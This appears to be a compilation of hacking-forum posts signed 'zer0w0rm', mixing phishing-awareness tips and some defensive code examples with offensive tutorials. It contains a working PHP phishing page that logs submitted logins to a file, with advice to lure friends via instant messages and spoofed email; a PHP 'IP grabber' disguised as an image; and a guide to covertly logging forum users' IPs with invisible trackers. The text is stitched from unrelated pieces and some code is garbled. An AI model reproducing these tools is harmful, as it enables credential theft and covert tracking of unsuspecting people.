Don’t Take the Bait, 4 Ways to Avoid Phishing Scams

As online fraud remains a consistent problem for nearly 300,000,000 Americans who use the internet daily, it’s important to stay informed about the newest forms of fraud that threaten our online security. The Better Business Bureau (BBB) warns internet users about “phishing” emails, a scam that is becoming an increasing problem and is proving to be very costly for employers. Chubbworks even published an article recently discussing email scams and surveyed how many people had actually received a phishing email themselves; a majority have.


The latest versions of these scams are showing up in the form of emails that appear to come from trusted organizations such as the BBB or United States Postal Service (USPS). The emails are sent by hackers asking you to submit information or to follow links that gather, or “phish,” for your personal data, which may include banking information, usernames, and/or passwords. These emails will oftentimes deliver a nasty virus to your computer system. Once your computer is infected, you become vulnerable to serious security risks. So how can you keep this from happening to you? Here are four things you should know:

1. Make sure to pay attention to spelling mistakes and grammatical errors in emails. 
A Fortune 500 company (or any large reputable business) is very unlikely to release an email blast riddled with misspellings.
 

2. Hold your cursor (don’t click) over any suspicious links. 
This will show you the URL that you are about to click. If the URL doesn’t contain the company name in the first part of the domain [www.company.com], it’s probably a scam.
    a. For example, if you were to receive an email that looks like it came from the United States Postal Service (USPS) and it asks you to click a link and that link doesn’t start with http://www.usps.com in the URL, it’s very likely it’s a phishing scam!

3. Keep your antivirus software up-to-date. 
Antivirus software helps to shield your computer from internet threats and those software updates are important because your program should be constantly evolving based on new hacker threats.
 

4. Last and certainly not least, educate your staff. 
 Make sure that they are aware of the caution they need to take when clicking links inside an email. Your staff should understand the potential consequences of getting a computer virus and how it could affect your clients (remember the Target fiasco last Thanksgiving?)
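Tip 2 can be automated on a mail gateway or in a training tool. The following is an added example, not part of the original article: it compares each link's real hostname with the expected domain and with the URL shown in the link text, because a link can begin with http://www.usps.com and still lead to a different host. The sample message and the example.net / example.org hosts are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample message body; example.net / example.org are reserved test domains.
SAMPLE_EMAIL = """
<p>Your parcel could not be delivered.</p>
<a href="https://www.usps.com/manage/">Track on usps.com</a>
<a href="http://www.usps.com.tracking-update.example.net/label">Print label</a>
<a href="http://parcel-status.example.org/usps">http://www.usps.com/track</a>
<a href="https://tools.usps.com/go/TrackConfirmAction">Tracking</a>
"""


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from the HTML body of an email."""

    def __init__(self):
        super().__init__()
        self.links = []
        self.href = None
        self.text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.href = dict(attrs).get("href") or ""
            self.text = []

    def handle_data(self, data):
        if self.href is not None:
            self.text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self.href is not None:
            self.links.append((self.href, "".join(self.text).strip()))
            self.href = None


def host_of(url):
    """Lower-cased hostname of a URL ('' if none); ignores any user@ prefix."""
    return (urlsplit(url).hostname or "").lower().rstrip(".")


def belongs_to(host, domain):
    """True only if host is the domain itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def text_host(text):
    """Hostname shown in the link text, if the text itself looks like a URL."""
    if not text or " " in text or "." not in text:
        return ""
    return host_of(text if "://" in text else "http://" + text)


def check_links(html_body, expected_domain):
    """Return [(host, [reasons])] for links that do not lead where they claim."""
    parser = LinkCollector()
    parser.feed(html_body)
    findings = []
    for href, text in parser.links:
        if urlsplit(href).scheme not in ("http", "https"):
            continue
        host = host_of(href)
        reasons = []
        if not belongs_to(host, expected_domain):
            # The company name inside some other domain is the classic lookalike.
            reasons.append("lookalike-host" if expected_domain in host else "other-domain")
        shown = text_host(text)
        if shown and shown != host:
            reasons.append("text-mismatch")
        if reasons:
            findings.append((host, reasons))
    return findings


if __name__ == "__main__":
    for host, reasons in check_links(SAMPLE_EMAIL, "usps.com"):
        print(host, reasons)
```
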

With so much information being stored on the web in today’s business world, it is important to be cautious with your personal data and information. Stay secure, and stay informed, so you don’t take the bait and put yourself at risk!

Thank you (zer0w0rm)
 

How to find out someone's IP address

Everyone sometimes needs to find out someone's IP address, for many different reasons. For years and years I used free hosting and PHP scripts that save IPs to a text file on the server. It is not so difficult, but it takes time and an email address, it requires registration, and your anonymity is not always secure. There are lots of tutorials on that topic on the internet. There are also several IP logger services available on the internet. Most of them create a special URL and then send the victim's IP to your email. I used all of those services, at least the ones that I could find. Today I will talk about one of them, which I've found the most advanced and easy to use: IPLOGGER.ORG



Pros:

- NO registration required
- NO email required
- NO limitations
- Absolutely free
- Absolutely legal

Cons: Sometimes for some IPs it shows a wrong city, which is not a big deal for me.

Several methods available:

- invisible iplogger (no evidence of ip grabbing)
- iplogger URL shortener (Short URL + IP grabber function)
- ip-userbars for signature in forum, blog etc. (nice signature + IP grabber feature)
- visitor counter (counter + IP grabber feature)
- ip informer with IP's of 10 recent visitors (sometimes helps against trolls)

Features:

- no limits on number of IP's recorded
- no email – no spam on your email address, no thousands of emails with IPs...
- generates short URL with iplogger-function, can be used as URL shortener
- short link and short domain name 2no.co can be used instead of 'iplogger.org' in generated URLs
- trace history of victim's IP change (unique feature!)
- Country, region and city detection, map function

The following tutorial covers only one method of using iplogger, that is 'Invisible iplogger' for forum.

How to use invisible iplogger on forums:

1. Go to IPLOGGER.ORG

2. Click 'Generate invisible iplogger'



3. Save your iplogger-ID somewhere so you can access your statistics



4. Copy 'BB-code for forum' to clipboard



5. Paste code from clipboard to your post, comment or private message to the person you want to know more about. Preview your post or comment and check if there is no any visible evidence of special IP-grabber code in your post.

NOTE: Check if the forum supports bb codes. If not, try html code or use other methods.

6. Go back to IPLOGGER.ORG and click 'View statistic' and view IP address of all people who have seen your post, as well as date and time when they saw it, their country and city, web page address they viewed your post from.



Notice that iplogger traces the history of changes in IP address when victims run a VPS or use a proxy.

Click on IP address to view it on the map.



7. To refresh the statistics and check whether more users have viewed your post or comments, click “Refresh”.

How to hide 'iplogger' in the generated link:

1. On the bottom of the main page of IPLOGGER.ORG select '2no.co' before generate your iplogger to eliminate any evidence of you intention to get someone's IP. The link generated will be like http://2no.co/1vAM which looks like just normal short url. This links can't be traced.



Good luck. Hope you like it so far...


Thank you (zer0w0rm)
 

IP Grabber on ANY website

Requirements:

  • Webhost that supports PHP


Instructions:

  1. Create a directory called:
     
    Code:
     
    image.png
  2. Create a file in image.png called:
     
    Code:
     
    index.php
  3. Paste this code in index.php:
    PHP Code:
     
    <? header ("Content-type: image/png");
    $newImg ImageCreate(1,1); $skyblue ImageColorAllocate($newImg,136,193,255); ImageFill($newImg,0,0,$skyblue); ImagePNG($newImg); ImageDestroy($newImg);
    ?>
    <?php

        $file
    ="log.txt";
        
    $hits=$domain GetHostByName($REMOTE_ADDR);
        
    $handle=fopen($file"w");
        
    fwrite($handle$hits);
        
    fclose($handle);
    ?>
     
  4. Create a file called log.txt
This appears as a broken image but really it records someone's IP address. This can be used on almost every website even if they don't allow PHP.


Thank you (zer0w0rm)
 

Top Scanners



Here are some sites to use for scanning:


http://www.cirt.net/nikto2
http://www.parosproxy.org/index.shtml
http://www.wiretrip.net/rfp/
http://portswigger.net/suite/
http://www.acunetix.com/
http://www.nstalker.com/products
http://www.nessus.org/nessus/
http://www.gfi.com/lannetscan/
http://www.eeye.com/...cts/Retina.aspx
http://www-arc.com/sara/
http://www.qualys.com/

Thank you (zer0w0rm)
 

Top Packet Sniffers


Here are some sites for packet sniffers:

http://www.wireshark.org/
http://www.kismetwireless.net/
http://www.tcpdump.org/
http://ettercap.sourceforge.net/
http://www.monkey.org/~dugsong/dsniff/
http://www.stumbler.net/
http://www.ntop.org/
http://etherape.sourceforge.net/
http://kismac.de/


Thank you (zer0w0rm)
 

Top 10 Password Crackers


Here are some sites for password crackers:

http://www.oxid.it/cain.html
http://www.openwall.com/john/
http://freeworld.thc.org/thc-hydra/
http://www.aircrack-ng.org/
http://www.l0phtcrack.com/
http://airsnort.shmoo.com/
http://www.solarwinds.com/
http://www.foofus.net/fizzgig/pwdump/
http://project-rainbowcrack.com/
http://www.hoobie.net/brutus/

Thank you (zer0w0rm)
 





If you are working in the field of computer networks or an enthusiast in the field of network security, you are sure to have come across the term “Denial of Service attack” which is simply referred to as “DoS attack”. Today, this is one of the most common types of network attacks carried out on the Internet. In this post, I will try to explain DoS attack, its variants and methods involved to carry out the same in an easily understandable manner.

What is a DoS Attack?

Denial of Service or DoS attack is a type of network attack designed to flood the target network or machine with a large amount of useless traffic so as to overload it and eventually bring it down to its knees. The main intention behind DoS attack is to make the services running on the target machine (such as a website) temporarily unavailable to its intended users. DoS attacks are usually carried out on web servers that host vital services such as banking, e-commerce or credit card processing.

A common variant of the DoS attack known as the DDoS (Distributed Denial of Service) attack has become quite popular in recent days as it is more powerful and hard to detect. A typical DoS attack has a single place of origin, while a DDoS attack originates from multiple IP addresses distributed across two or more different networks. The working of a DDoS attack is shown in the following diagram:





Unlike a DoS attack, where the attacker uses one single computer or network to attack the target, a DDoS attack originates from different pre-compromised computers belonging to different networks. As the attacker uses a number of computer systems from different networks, each residing in a different geographical location, the incoming traffic looks natural and therefore becomes hard to detect.

Protection Against DoS/DDoS Attacks:

DoS attacks can easily be handled by blacklisting the source IP (or range of IPs) found to be making too many requests/connections (in an unnatural way) to the server. However, DDoS attacks are more complicated, as the incoming requests seem more natural and are distributed. In this case it is hard to tell genuine traffic from malicious traffic. Taking action at the firewall level to blacklist suspected IPs may result in false positives and therefore may affect genuine traffic as well.
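The difference described above shows up directly in a per-source rate check. This is an added example, not from the original post: a sliding-window counter run over two constructed request logs, one with a single noisy source and one with many sources that each stay under the limit. The log format, the 10-second window and the limit of 20 requests are assumptions chosen for illustration.

```python
from collections import defaultdict, deque


def parse_line(line):
    """'<epoch_seconds> <source_ip> <path>' -> (timestamp, source_ip)."""
    ts, ip, _path = line.split()
    return float(ts), ip


def peak_per_key(events, window):
    """Peak number of events per key inside any `window`-second span.

    `events` must be (timestamp, key) pairs in time order.
    """
    recent = defaultdict(deque)
    peak = defaultdict(int)
    for ts, key in events:
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:      # drop requests that left the window
            q.popleft()
        peak[key] = max(peak[key], len(q))
    return dict(peak)


def noisy_sources(lines, window=10.0, limit=20):
    """Sources whose own request rate exceeds `limit` per window (blacklist candidates)."""
    peaks = peak_per_key(map(parse_line, lines), window)
    return {ip: n for ip, n in peaks.items() if n > limit}


def peak_total_rate(lines, window=10.0):
    """Peak request count from all sources combined in any window."""
    events = ((ts, "all") for ts, _ip in map(parse_line, lines))
    return peak_per_key(events, window).get("all", 0)


def by_time(lines):
    return sorted(lines, key=lambda line: float(line.split()[0]))


def single_source_log():
    """Constructed: one source sends 50 requests in 5 s, one normal client sends 3."""
    lines = [f"{1000 + i * 0.1:.1f} 198.51.100.7 /login" for i in range(50)]
    lines += [f"{1000 + i * 3:.1f} 192.0.2.10 /index" for i in range(3)]
    return by_time(lines)


def distributed_log():
    """Constructed: 200 sources send 5 requests each within the same 10 s."""
    lines = []
    for host in range(1, 201):
        for k in range(5):
            lines.append(f"{2000 + k * 2 + host / 1000:.3f} 203.0.113.{host} /login")
    return by_time(lines)


if __name__ == "__main__":
    print("single source :", noisy_sources(single_source_log()))
    print("distributed   :", noisy_sources(distributed_log()),
          "total peak", peak_total_rate(distributed_log()))
```

In the distributed log no single address crosses the limit even though the combined load is roughly twenty times that of the single-source case, which is why lowering the per-IP limit to catch it starts blocking ordinary clients.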

Methods Involved in DoS Attack:

The following are some of the commonly employed methods in carrying out a DoS attack:

SYN Flood Attack
Ping Flood Attack (Ping of Death)
Teardrop Attack
Peer-to-Peer Attacks

Thank You (zer0w0rm)
 

Wireless Hacking Basics

Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.

The step-by-step procedure in wireless hacking can be explained with the help of the following topics:

1) Stations and Access Points :  A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

2) Channels :  The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

3) Wired Equivalent Privacy (WEP) :  It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

4) Wireless Network Sniffing :  Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

5) Passive Scanning :  Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

6) Detection of SSID :  The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning.

7) Collecting the MAC Addresses :  The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.

8) Collecting the Frames for Cracking WEP :  The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames. An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

9) Detection of the Sniffers :  Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

10) Wireless Spoofing :  There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

11) MAC Address Spoofing :  The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

12) IP spoofing :  Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

13) Frame Spoofing :  The attacker will inject frames that are valid but whose content is carefully spoofed.

14) Wireless Network Probing :
 The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

15) AP Weaknesses :
 APs have weaknesses that are due both to design mistakes and to user interfaces.

16) Trojan AP :  An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

17) Denial of Service :  A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent and difficult to stop once under way, and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

18) Jamming the Air Waves :  A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal-to-noise ratio drops so low that the wireless LAN ceases to function.

19) War Driving :  Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Tips for Wireless Home Network Security

1) Change Default Administrator Passwords (and Usernames)
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering
7) Turn Off the Network During Extended Periods of Non-Use
8) Position the Router or Access Point Safely 


To know them better, google them.
Thank you (zer0w0rm)
 

Encryption Methods

This tutorial covers some popular encryption methods. To begin, you will need some things:


1. You need the encrypted data

You will have to find the encrypted data. Sometimes it's hidden in a webpage, disguising itself as something different. Sometimes it is just written somewhere in the open, but the passkey or the referencing alphabet is hidden.

2. You need to know what the crypt represents

If you have a crypt, but you do not know what you are trying to find in it, you will have a much harder time. You should first try to guess what the result of the decryption is. It could be plain text, or a picture, maybe even a binary program. And if it is text it could be special text, like mathematical expressions, coordinates or just numbers. There are many possibilities, but usually only a few make sense.


3. You need to know how it was encrypted, or at least have a rough guess.

To decrypt the crypt you will first have to know how it was encrypted. There are endless possibilities. First see if you can find out how it was encrypted by investigating the background of the guy that encrypted it or the circumstances of the crypt. There may be hints around. A professional cryptanalyst may need nothing but the crypt to get a good idea of how it was encrypted, and even if he has no idea he may still decrypt it by using professional methods. But here, for us, you should know how it was encrypted at some point during decryption.. ;)


4. Now, what does it mean that something is encrypted?

Let's say I have the word: "hello". Now I reverse the word, which gives me "olleh". This is a simple encryption. If someone sees this text on a piece of paper he would probably think it's a foreign language: "?uoy era woh yeh." But you know it's plain English text, and can easily decrypt it. There are many ways to encrypt text to make it look like no text at all. If another person knows how it was encrypted, he can easily decrypt it and get the message from the crypt. First I want to point out some basic encryption methods:

1. Caesar cipher

Simple cipher that shifts the alphabet by some number of letters. "abcdef" shifted by 2 becomes "cdefgh". ROT-13, for example, is a rotation of the alphabet by 13 letters. ROT-13 is so popular because there are 26 letters in the alphabet, so it's easy to encrypt a text and then encrypt it a second time to get it back to normal. You can write small programs to look for this kind of easy encryption (or just use rot13.com).

2. Mono-alphabetic substitution

Replaces every letter with some other letter from the alphabet. No letter can be used twice, of course. You will need a key that holds the mapping of the characters. The key has two parts. The first part is the original alphabet and the second part is the encryption key. Let's say "abcdef" is mapped to "fedcba". That means the word "beef" becomes "ebba". To crack those ciphers you will need to look for more frequent letters and words and guess the text... you will need a fairly large sample of ciphered text for it to work out. The word "the", for example, is often used in the English language; for other languages it may be other words, of course...

3. Vigenere cipher

Every letter in the word gets shifted by a certain amount that is set by the password. This means the following... let's say the password is "bcde". Now say a=1, b=2 and so on... that means the first letter of the original text is shifted 2 letters, the second one is shifted by 3 letters and so on. This works great until you run out of password characters. (It's only 4 characters long.) Then you just start from the beginning again, in this case with "b" (=2). Notice how the A is converted to a number, here one (1) in the example. This is referencing by position. We will talk about that in a bit more detail later.

4. One time pad (with XORing)

The safest version of encrypting is a one time pad. You have a long line of random letters. Those letters are known by you and the guy that needs to decrypt the message. You now encrypt every letter of the original text with the letter at the same position in that random letter line. The result is the cipher that you send away. The guy on the other end has the one time pad and can extract the original letters by decoding with the one time pad random letters. The only bad thing is: you got to get the one time pad to the other side, hopefully without anyone else getting a copy of it they can use to decrypt your message. Additionally the receiver needs to know which pad to use for the decryption if there is more than one pad available.

Now how do you encrypt the two lines of letters with each other? You need to XOR them. First convert them to binary. A binary number consists only of 0s and 1s. You can describe any letter with a binary number, either using the ASCII code of the letter as a base or using an alphabet numbering, like A=1, B=2 or similar. Now, after both strings are converted to binary, you have a very long line of 0s and 1s. You still know which numbers represent which letter because you won't delete leading zeros, so that, for example, every 8 digits represent one letter. (8-bit code)
Now XOR the two strings by using an exclusive-or method. This means: if exactly one of the two bits is 1, the result is 1. If both are 0 or both are 1, the result is 0.

0 xor 0 = 0
0 xor 1 = 1
1 xor 0 = 1
1 xor 1 = 0

The resulting string can be decrypted by XORing with the known passkey (the one time pad you transmitted earlier to the other side), and then finally by converting to letters again by using either ASCII codes or alphabetic numbering (meaning: by referencing the position in a certain known alphabet).
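The Caesar, Vigenere and one-time-pad descriptions above, worked through in code. This is an added example, not part of the original tutorial: the Caesar cracker is the kind of "small program" mentioned under the Caesar cipher, the Vigenere function uses the tutorial's a=1, b=2 numbering (the textbook cipher counts a=0), and the word list and sample sentences are constructed for illustration.

```python
import secrets

# Small constructed word list used to recognise English plaintext.
COMMON = {"the", "and", "you", "are", "how", "hey", "that", "this", "with", "have"}


def shift_char(ch, shift):
    """Rotate one ASCII letter by `shift` places; leave everything else alone."""
    for base in ("a", "A"):
        if base <= ch <= chr(ord(base) + 25):
            return chr((ord(ch) - ord(base) + shift) % 26 + ord(base))
    return ch


def caesar(text, shift):
    return "".join(shift_char(ch, shift) for ch in text)


def crack_caesar(ciphertext):
    """Try all 26 shifts and keep the one that yields the most common words."""
    def score(candidate):
        return sum(w.strip(".,!?") in COMMON for w in candidate.lower().split())
    best = max(range(26), key=lambda s: score(caesar(ciphertext, -s)))
    return best, caesar(ciphertext, -best)


def vigenere(text, password, decrypt=False):
    """Shift each letter by the password letter's position, counting a=1."""
    out, used = [], 0
    for ch in text:
        if ch.isascii() and ch.isalpha():
            shift = ord(password[used % len(password)].lower()) - ord("a") + 1
            out.append(shift_char(ch, -shift if decrypt else shift))
            used += 1                      # the password only advances on letters
        else:
            out.append(ch)
    return "".join(out)


def bits(data):
    """8-bit groups with leading zeros kept, as the tutorial describes."""
    return " ".join(f"{b:08b}" for b in data)


def xor_pad(data, pad):
    """XOR with a pad; the same call encrypts and decrypts."""
    if len(pad) < len(data):
        raise ValueError("the pad must be at least as long as the message")
    return bytes(d ^ p for d, p in zip(data, pad))


def reuse_leak(msg1, msg2, pad):
    """XOR of two ciphertexts made with the SAME pad: the pad cancels out."""
    return xor_pad(xor_pad(msg1, pad), xor_pad(msg2, pad))


if __name__ == "__main__":
    print(caesar("abcdef", 2))
    print(crack_caesar(caesar("Hey, how are you? Meet me at the usual place.", 7)))
    print(vigenere("hello", "bcde"))
    pad = secrets.token_bytes(5)
    print(bits(xor_pad(b"hello", pad)))
```

`reuse_leak` returns the XOR of the two plaintexts without any knowledge of the pad, which is why a pad must be used only once.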

Converting numbers to letters or vice versa

You already noticed how in those examples letters are becoming numbers or vice versa. Generally this is done by mapping letters to numbers in one way or another. Using computers there are generally two ways of mapping. The first one is the ASCII table, which converts every character (letter, number, special characters) to a certain number code. You can easily find out about ASCII using a search engine. The second one is Unicode, which is a replacement for ASCII codes that became necessary because ASCII codes are limited to representing 255 letters, leaving not enough room for all the different letters that some languages have, like Chinese for example. Again, use a search engine to learn about Unicode.
Now, not using computers, you can have a reference alphabet and convert a letter to a number by its position in the alphabet, and vice versa. Let's say the alphabet is "gcqlxebm", then G = 1, C = 2, Q = 3. The most natural alphabet is of course "abcdefghijk...", so it's used quite often.

Another method to convert letters to numbers is using hex numbers. Hex numbers can have the letters A-F, representing the digits 10-15, which means that certain numbers will consist only of letters... For those who don't know, hex numbers are based on 16 instead of base 10 as our normal numbers are.

Converting numbers to numbers

This may sound easy, but it's important for cryptography. Remember that you can always change the way something looks by changing it into some other number system. Our normal system is based on ten, probably because we have ten fingers and toes. This means that you can easily make a number totally unusable to an attacker if you change it to another base without him knowing. A number based on 16 may look the same as a number based on 10, but it's a totally different value. So make sure you know what you are looking at. If you have a very large sample of numbers and not a single digit is above 3, then it is probably the base 4 system. Generally, it can be ANY base number. You had better find out which one.

Thank you (zer0w0rm)
 

Phishing Pages

So what exactly is phishing? Well, phishing is getting someone to click on a link to a fake login page that you have made, and getting them to enter their information. You can get them to do this by spoofing an e-mail or sending it to them in an instant message or something. I have tried to make each step as easy to follow as possible so anyone can do it.

1. Decide who and where you want to get into

When I did this myself, I was trying to get into all of my friend's MySpace accounts. Then go to the website you chose, right-click, and View Source.

2. Save the source as login.html

Then open Notepad and paste the following into it:


foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;


Save as data.txt

3. Register at a free webhosting place that will let you use PHP

(I used 100webspace.com) Then register at a place that won't display advertisements on your site. (I used 50webs.com) It would be a good idea to try to login to the website your making a fake of but with a bad password. Copy the link for the error page.

4. Get a program that will let you save as .php

(I used EditPlus2 from http://www.editplus.com) Open the program then copy and paste the following:

<?php
header("Location: someplace.html");
$handle = fopen("data.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>


Now, look at the second line of code. Do you notice '("Location: someplace.html")'? Change someplace.html to the error page. Save as log.php

5. Upload data.txt and log.php at the site that will let you use php

(100webspace.com) Then open login.html in Notepad.
Search for <form action="some file name"> Replace their file name with a link to your log.php. Save and then upload login.html.

6. Test out your new login page

Load your data.txt from your website(yoururl.hostdomain/data.txt) and it should have your test login listed. You can re-upload data.txt to get rid of your test login information.

Ok now that you have your fake login page done you need to get the people there. The method I chose to do was to make the page different and tell people it was a secret login page. I put it in my away message on AIM and told them if they logged in at that page they would see something cool. Another way is to spoof an email.

Thank you (zer0w0rm)
 

How connect anonymous VPN PPTP on Kali Linux AProVPN.com

Hello Guys

Today we learn how to install and configure a VPN in Kali Linux.







By default, VPN is not configured in Kali Linux. If you want to connect to a VPN in Kali Linux, first install the PPTP and OpenVPN network-manager packages using apt-get install.
Command :
apt-get install network-manager-openvpn-gnome
apt-get install network-manager-pptp
apt-get install network-manager-pptp-gnome
apt-get install network-manager-strongswan
apt-get install network-manager-vpnc
apt-get install network-manager-vpnc-gnome
/etc/init.d/network-manager restart

Thank you (zer0w0rm)

 

Firefox Addons For Penetration Testing

1>Firebug---

(useful for the debugging tools that can help you tracking rogue javascript code on servers)---

https://addons.mozilla.org/en-US/firefox/addon/firebug/





2>User Agent Switcher---

(You can use this extension to change the user agent of your browser)

https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/





3>HackBar---

(Useful for SQL injection and XSS attacks)

https://addons.mozilla.org/en-US/firefox/addon/hackbar/





4>HttpFox---

(Monitor and analyze all the incoming and outgoing HTTP traffic between your browser and the web server.)

https://addons.mozilla.org/en-US/firefox/addon/httpfox/





5>Live HTTP Headers---

(View the HTTP headers of a website instantly)

https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/





6>Tamper Data---

(View and modify HTTP/HTTPS headers and post parameters.)

https://addons.mozilla.org/en-US/firefox/addon/tamper-data/





7>ShowIP---

(Shows the IP of the current page)

https://addons.mozilla.org/en-US/firefox/addon/showip/





8>OSVDB---

(Open Source Vulnerability Database Search)

https://addons.mozilla.org/en-us/firefox/addon/osvdb/





9>Packet Storm search plugin---

(Search the packet storm database for exploits)

https://addons.mozilla.org/en-us/firefox/addon/packet-storm-search-plugin/





10>Offsec Exploit-db Search---

(Search the Exploit-db archive)

https://addons.mozilla.org/en-us/firefox/addon/offsec-exploit-db-search/





11>Security Focus Vulnerabilities Search Plugin----

(Search for vulnerabilities in the Security Focus)

https://addons.mozilla.org/en-us/firefox/addon/securityfocus-vulnerabilities-/





12>Cookie Watcher---

(Watch the selected cookie in the status bar)

https://addons.mozilla.org/en-us/firefox/addon/cookie-watcher/





13>Header Spy---

(Shows HTTP Headers on status bar)

https://addons.mozilla.org/en-us/firefox/addon/header-spy/





14>Groundspeed---

(Manipulate the application user interface)

https://addons.mozilla.org/en-us/firefox/addon/groundspeed/





15>CipherFox---

(Displays the current SSL/TLS cipher and certificate on the status bar)

https://addons.mozilla.org/en-us/firefox/addon/cipherfox/





16>XSS Me---

(Tool for testing reflected XSS vulnerabilities)

https://addons.mozilla.org/en-us/firefox/addon/xss-me/





17>SQL Inject Me---

(Extension to test SQL Injection vulnerabilities)

https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/





18>Wappalyzer---

(Discover technologies and applications that are used on websites)

https://addons.mozilla.org/en-us/firefox/addon/wappalyzer/





19>Poster---

(Make HTTP requests,interact with web services and watch the output)

https://addons.mozilla.org/en-us/firefox/addon/poster/





20>Javascript Deobfuscator---

(Show the JavaScript code that is running on web pages)

https://addons.mozilla.org/en-us/firefox/addon/javascript-deobfuscator/





21>Modify Headers---

(Modify HTTP request headers)

https://addons.mozilla.org/en-us/firefox/addon/modify-headers/





22>FoxyProxy---

(Advanced proxy management tool)

https://addons.mozilla.org/en-us/firefox/addon/foxyproxy-standard/





23>FlagFox---

(Displays a country flag for the location of the web server)

https://addons.mozilla.org/en-us/firefox/addon/flagfox/





24>Greasemonkey---

(Customize the way a webpage behaves by using small bits of JavaScript)

https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/





25>Domain Details---

(Displays Server Type, Headers, IP Address, Location Flag, and links to Whois Reports)

https://addons.mozilla.org/en-us/firefox/addon/domain-details/





26>Websecurify---

(Useful for security assessments in web applications)

https://addons.mozilla.org/en-us/firefox/addon/websecurify/





27>XSSed Search---

(Search the cross-site scripting database at XSSed.Com)

https://addons.mozilla.org/en-us/firefox/addon/xssed-search/





28>ViewStatePeeker---

(ASP.NET viewstate viewer)

https://addons.mozilla.org/en-us/firefox/addon/viewstatepeeker/





29>CryptoFox---

(CryptoFox is an encryption/decryption tool for cracking MD5 passwords)

https://addons.mozilla.org/en-US/firefox/addon/cryptofox/





30>WorldIP---

(Location of the web server, IP, Datacenter, Ping, Traceroute, RDNS, AS etc.)

https://addons.mozilla.org/en-US/firefox/addon/worldip-flag-and-datacenter-pi/





31>Server Spy---

(Unveils the technology of the web server (Apache, IIS etc.))

https://addons.mozilla.org/en-US/firefox/addon/server-spy/





32>Default Passwords---

(Search CIRT.net default password database)

https://addons.mozilla.org/en-US/firefox/addon/default-passwords-cirtne-58786/





33>Snort IDS Rule Search---

(Search for Snort IDS Rules)

https://addons.mozilla.org/en-US/firefox/addon/snort-ids-rule-search/





34>Fireforce---

(brute force attack)

https://addons.mozilla.org/en-US/firefox/addon/fireforce/





..enjoy Hackers.
 

Kali Linux Dual Boot with Windows

Hello



Today I will show you how to install Kali as a dual boot with Windows.



First, download Kali Linux from here (http://www.kali.org/).



